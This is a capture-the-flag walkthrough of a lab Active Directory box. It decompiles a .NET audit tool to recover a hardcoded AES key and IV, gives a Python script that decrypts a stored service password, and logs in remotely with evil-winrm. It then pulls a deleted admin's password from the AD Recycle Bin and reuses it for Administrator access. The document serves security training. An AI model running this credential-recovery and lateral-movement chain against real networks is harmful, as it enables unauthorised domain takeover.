Now we also noticed CascAudit.exe, and it’s written in .NET.
That’s interesting.
With .NET binaries, we’re in a good position because they’re easy to decompile.
So the move is simple: open it in ILSpy and review the source code.
{
sQLiteConnection.Open();
SQLiteCommand sQLiteCommand = new SQLiteCommand("SELECT * FROM LDAP", sQLiteConnection);
try
{
SQLiteDataReader sQLiteDataReader = sQLiteCommand.ExecuteReader();
try
{
sQLiteDataReader.Read();
text = Conversions.ToString(sQLiteDataReader["Uname"]);
text2 = Conversions.ToString(sQLiteDataReader["Domain"]);
string encryptedString = Conversions.ToString(sQLiteDataReader["Pwd"]);
try
{
password = Crypto.DecryptString(encryptedString, "c4scadek3y654321");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
Console.WriteLine("Error decrypting password: " + ex2.Message);
ProjectData.ClearProjectError();
return;
}
}
finally
{
IDisposable disposable = sQLiteDataReader as IDisposable;
if (disposable != null)
{
disposable.Dispose();
}
}
}
finally
{
((IDisposable)(object)sQLiteCommand)?.Dispose();
}
sQLiteConnection.Close();
}
Of course, I’m not super well-versed in .NET, so I used a little AI help to break this down.
Looking at the code, we see:
Crypto.DecryptString(encryptedString, "c4scadek3y654321")
Which basically tells us everything.
encryptedString → that’s the value from the DB
"c4scadek3y654321" → that’s the key
DecryptString → that’s what turns it back into plaintext
So this isn’t just “encoded again.” It’s encrypted. And they left the key sitting right there in the source code.
Even better, the function references CascCrypto.dll, which we also saw sitting in the share.
-rw-rw-rw- 12288 Wed Jan 29 13:01:26 2020 CascCrypto.dll
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

public static string DecryptString(string EncryptedString, string Key)
{
byte[] array = Convert.FromBase64String(EncryptedString);
Aes aes = Aes.Create();
aes.KeySize = 128;
aes.BlockSize = 128;
aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
aes.Mode = CipherMode.CBC;
aes.Key = Encoding.UTF8.GetBytes(Key);
using MemoryStream stream = new MemoryStream(array);
using CryptoStream cryptoStream = new CryptoStream(stream, aes.CreateDecryptor(), CryptoStreamMode.Read);
byte[] array2 = new byte[checked(array.Length - 1 + 1)];
cryptoStream.Read(array2, 0, array2.Length);
return Encoding.UTF8.GetString(array2);
}
Again… went to AI to break it down because I’m not pretending to be a .NET crypto expert 😂
Long story short:
"1tdyjCbY1Ix49842" → the IV
"c4scadek3y654321" → the key
Which means…
This is fully reversible.
They gave us the algorithm (AES-128-CBC), the key, and the IV.
That’s the entire recipe.
So instead of guessing or cracking anything, we just replicate the logic.
Since we know it’s AES-128-CBC, we can write a quick Python script, import pyaes, plug in the key and IV, decode the Base64 string, and decrypt it properly.
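Here is that script as an added example, not the one from the original post. Instead of pyaes it carries its own small AES-128 implementation so it runs with nothing but the Python standard library (that substitution is mine); the key, IV and Base64 string are the literals recovered from CascCrypto.dll and Audit.db above. The takeaway for anyone shipping software like this: once the key and IV live inside the binary, the "encryption" is no stronger than the Base64 around it, and this is all it takes to undo it.

```python
import base64


def gen_sbox():
    """Derive the AES S-box: GF(2^8) multiplicative inverse, then the affine map."""
    sbox = [0] * 256
    p = q = 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF  # p *= 3
        q ^= q << 1  # q /= 3, so q stays the inverse of p
        q ^= q << 2
        q ^= q << 4
        q &= 0xFF
        if q & 0x80:
            q ^= 0x09
        x = q  # affine transform: q xor its four left rotations, xor 0x63
        for s in (1, 2, 3, 4):
            x ^= ((q << s) | (q >> (8 - s))) & 0xFF
        sbox[p] = x ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox


SBOX = gen_sbox()
INV_SBOX = [0] * 256
for _i, _v in enumerate(SBOX):
    INV_SBOX[_v] = _i


def xtime(a):
    """Multiply by x (0x02) in GF(2^8)."""
    a <<= 1
    return (a ^ 0x1B) & 0xFF if a & 0x100 else a


def gmul(a, b):
    """General GF(2^8) multiply, used by InvMixColumns."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = xtime(a), b >> 1
    return r


def expand_key(key):
    """AES-128 key schedule: 44 words returned as 11 round keys of 16 bytes."""
    words = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 44):
        t = list(words[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]  # RotWord then SubWord
            t[0] ^= rcon
            rcon = xtime(rcon)
        words.append([a ^ b for a, b in zip(words[i - 4], t)])
    return [sum(words[4 * r:4 * r + 4], []) for r in range(11)]


def inv_shift_rows(s):
    # state is stored column-major: state[4*col + row]; row r rotates right by r
    return [s[4 * ((c - r) % 4) + r] for c in range(4) for r in range(4)]


def inv_mix_columns(s):
    out = []
    for c in range(4):
        a0, a1, a2, a3 = s[4 * c:4 * c + 4]
        out += [gmul(a0, 14) ^ gmul(a1, 11) ^ gmul(a2, 13) ^ gmul(a3, 9),
                gmul(a0, 9) ^ gmul(a1, 14) ^ gmul(a2, 11) ^ gmul(a3, 13),
                gmul(a0, 13) ^ gmul(a1, 9) ^ gmul(a2, 14) ^ gmul(a3, 11),
                gmul(a0, 11) ^ gmul(a1, 13) ^ gmul(a2, 9) ^ gmul(a3, 14)]
    return out


def decrypt_block(block, rks):
    """FIPS-197 inverse cipher for a single 16-byte block."""
    s = [b ^ k for b, k in zip(block, rks[10])]
    for rnd in range(9, 0, -1):
        s = [INV_SBOX[b] for b in inv_shift_rows(s)]
        s = inv_mix_columns([b ^ k for b, k in zip(s, rks[rnd])])
    s = [INV_SBOX[b] for b in inv_shift_rows(s)]
    return bytes(b ^ k for b, k in zip(s, rks[0]))


def aes128_cbc_decrypt(ciphertext, key, iv):
    """Raw CBC decryption; padding is checked separately so a wrong key is visible."""
    if len(key) != 16 or len(iv) != 16 or len(ciphertext) % 16:
        raise ValueError("need a 16-byte key, a 16-byte IV and block-aligned input")
    rks, prev, out = expand_key(key), iv, bytearray()
    for i in range(0, len(ciphertext), 16):
        blk = ciphertext[i:i + 16]
        out += bytes(a ^ b for a, b in zip(decrypt_block(blk, rks), prev))
        prev = blk
    return bytes(out)


def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= 16 or data[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS#7 padding: wrong key/IV or a different padding scheme")
    return data[:-n]


def decrypt_string(encrypted_b64, key="c4scadek3y654321", iv="1tdyjCbY1Ix49842"):
    """Mirror of CascCrypto.DecryptString; the defaults are the literals from the DLL."""
    raw = base64.b64decode(encrypted_b64)
    return pkcs7_unpad(aes128_cbc_decrypt(raw, key.encode(), iv.encode())).decode()


if __name__ == "__main__":
    print(decrypt_string("BQO5l5Kj9MdErXx6Q6AGOw=="))  # value from the Ldap table
```

Run as-is it prints the ArkSvc password. Unlike the .NET version, which copies whatever the CryptoStream returns into a fixed-size buffer, `decrypt_string` raises on bad PKCS#7 padding, the usual symptom of a wrong key, IV or padding scheme, instead of handing back silent garbage.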
Now we have the ArkSvc password.
w3lc0meFr31nd
Now let’s try connecting with evil-winrm using the ArkSvc credentials.
jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.42.114 -u arksvc -p w3lc0meFr31nd
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\arksvc\Documents>
Now instead of blindly poking around, let’s go back to what we already gathered earlier.
We did a lot of LDAP enumeration before we ever had a shell.
cn: ArkSvc
distinguishedName: CN=ArkSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109161820.0Z
whenChanged: 20200323113833.0Z
displayName: ArkSvc
uSNCreated: 12799
memberOf: CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=AD Recycle Bin,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295021
name: ArkSvc
objectGUID: ELXj5FhFXUmr2tAqpnaTNA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 132248055409887841
pwdLastSet: 132230603002172876
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFUgQAAA==
accountExpires: 9223372036854775807
logonCount: 13
sAMAccountName: arksvc
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163635.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 16010101000417.0Z
lastLogonTimestamp: 132294371134322815
This account is a member of the AD Recycle Bin group.
The Active Directory Recycle Bin allows recovery of accidentally deleted AD objects like users, groups, and computers without restoring from backup. It preserves full attributes and group memberships for a default period of 180 days.
On a side note, while playing around with the Audit.db database, I came across the schema and noticed commands that deleted a few users — including TempAdmin.
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE IF NOT EXISTS "Ldap" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
"uname" TEXT,
"pwd" TEXT,
"domain" TEXT
);
INSERT INTO Ldap VALUES(1,'ArkSvc','BQO5l5Kj9MdErXx6Q6AGOw==','cascade.local');
CREATE TABLE IF NOT EXISTS "Misc" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
"Ext1" TEXT,
"Ext2" TEXT
);
CREATE TABLE IF NOT EXISTS "DeletedUserAudit" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
"Username" TEXT,
"Name" TEXT,
"DistinguishedName" TEXT
);
INSERT INTO DeletedUserAudit VALUES(6,'test',replace('Test\nDEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d','\n',char(10)),'CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local');
INSERT INTO DeletedUserAudit VALUES(7,'deleted',replace('deleted guy\nDEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef','\n',char(10)),'CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local');
INSERT INTO DeletedUserAudit VALUES(9,'TempAdmin',replace('TempAdmin\nDEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a','\n',char(10)),'CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local');
DELETE FROM sqlite_sequence;
INSERT INTO sqlite_sequence VALUES('Ldap',2);
INSERT INTO sqlite_sequence VALUES('DeletedUserAudit',10);
COMMIT;
TempAdmin is in the Recycle Bin:
*Evil-WinRM* PS C:\Users\arksvc\Desktop> Get-ADObject -ldapfilter "(&(objectclass=user)(isDeleted=TRUE))" -IncludeDeletedObjects
Deleted : True
DistinguishedName : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
Name : CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
ObjectClass : computer
ObjectGUID : 6d97daa4-2e82-4946-a11e-f91fa18bfabe
Deleted : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
In the output, we see something that looks very familiar.
The cascadeLegacyPwd custom attribute.
That’s the same attribute we saw earlier leaking credentials.
Which means even though TempAdmin was deleted, its attributes were preserved in the Recycle Bin — including that custom password field.
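The DeletedUserAudit rows in the dump above and the Get-ADObject output use the same tombstone naming: the last RDN, a newline (written as \0A in the DN), then DEL: and the object GUID, all parked under CN=Deleted Objects. As an added example for this walkthrough (not code from the post or from CascAudit.exe), the script below loads those three rows into an in-memory SQLite copy of the table and parses that form, so a reviewer can list what the audit tool recorded and check that each Name and DistinguishedName agree. The rows are copied from the dump; the consistency check and the regular expression are my own.

```python
import re
import sqlite3

# Rows copied from the Audit.db dump in the text. The Name column holds a real
# newline before "DEL:" (the dump wrote it as replace(...,'\n',char(10))) and the
# DistinguishedName holds the LDAP escape "\0A" for that same newline.
DELETED_USER_AUDIT_ROWS = [
    (6, "test", "Test\nDEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d",
     "CN=Test\\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local"),
    (7, "deleted", "deleted guy\nDEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef",
     "CN=deleted guy\\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local"),
    (9, "TempAdmin", "TempAdmin\nDEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a",
     "CN=TempAdmin\\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local"),
]

# Shape of a Recycle Bin tombstone DN:
#   CN=<last RDN>\0ADEL:<objectGUID>,CN=Deleted Objects,<domain DN>
TOMBSTONE_DN = re.compile(
    r"^CN=(?P<rdn>.+?)\\0ADEL:(?P<guid>[0-9a-fA-F-]{36}),(?P<container>CN=Deleted Objects,.+)$")


def parse_tombstone_dn(dn):
    """Split a deleted-object DN into last RDN, objectGUID and container; None if not one."""
    m = TOMBSTONE_DN.match(dn)
    if not m:
        return None
    return {"rdn": m.group("rdn"), "guid": m.group("guid").lower(),
            "container": m.group("container")}


def load_audit_db(rows=DELETED_USER_AUDIT_ROWS):
    """Build an in-memory copy of DeletedUserAudit with the schema shown in the dump."""
    conn = sqlite3.connect(":memory:")
    conn.execute('CREATE TABLE "DeletedUserAudit" ("Id" INTEGER PRIMARY KEY AUTOINCREMENT, '
                 '"Username" TEXT, "Name" TEXT, "DistinguishedName" TEXT)')
    conn.executemany("INSERT INTO DeletedUserAudit VALUES (?, ?, ?, ?)", rows)
    conn.commit()
    return conn


def deleted_accounts(conn):
    """List every audited deletion with its GUID and whether Name and DN agree."""
    report = []
    query = "SELECT Username, Name, DistinguishedName FROM DeletedUserAudit ORDER BY Id"
    for username, name, dn in conn.execute(query):
        parsed = parse_tombstone_dn(dn)
        display, _, marker = name.partition("\n")
        report.append({
            "username": username,
            "display": display,
            "guid": parsed["guid"] if parsed else None,
            # a row whose Name and DN disagree would deserve a second look
            "consistent": parsed is not None and parsed["rdn"] == display
            and marker == "DEL:" + parsed["guid"],
        })
    return report


if __name__ == "__main__":
    for entry in deleted_accounts(load_audit_db()):
        print(entry)
```

The same `parse_tombstone_dn` works on the DistinguishedName lines that Get-ADObject prints, which is handy when reconciling an audit table like this one against what is actually still sitting in the Recycle Bin.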
Get-ADObject -ldapfilter "(&(objectclass=user)(isDeleted=TRUE))" -IncludeDeletedObjects -Properties *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : [email protected]
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
Looks like it’s Base64 encoded again.
jbrown@Jabaris-MacBook-Pro cascade % echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles%
Since the account is deleted, we can’t log in as TempAdmin directly. But remember what we found earlier:
“Username is TempAdmin (password is the same as the normal admin account password).”
That’s the key.
If TempAdmin’s password matches the normal Administrator account, and we just decoded that password from the cascadeLegacyPwd attribute, then we don’t need TempAdmin at all. We can just authenticate as Administrator.
jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.42.114 -u Administrator -p baCT3r1aN00dles
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> ls
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 1/26/2020 11:56 PM Contacts
d-r--- 11/8/2021 3:58 PM Desktop
d-r--- 1/28/2020 6:26 PM Documents
d-r--- 1/26/2020 11:56 PM Downloads
d-r--- 1/26/2020 11:56 PM Favorites
d-r--- 1/26/2020 11:56 PM Links
d-r--- 1/26/2020 11:56 PM Music
d-r--- 1/26/2020 11:56 PM Pictures
d-r--- 1/26/2020 11:56 PM Saved Games
d-r--- 1/26/2020 11:56 PM Searches
d-r--- 1/26/2020 11:56 PM Videos
-a---- 3/25/2020 11:17 AM 645729 wds_current_setup.exe
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/3/2026 12:53 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
**RootFlagFoundHere****
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
And just like that — we’re Administrator.
What started as anonymous LDAP enumeration turned into:
This box was a perfect reminder that AD isn’t about one big exploit.
It’s about chaining small misconfigurations together.
Another step forward in the AD journey.
On to the next one.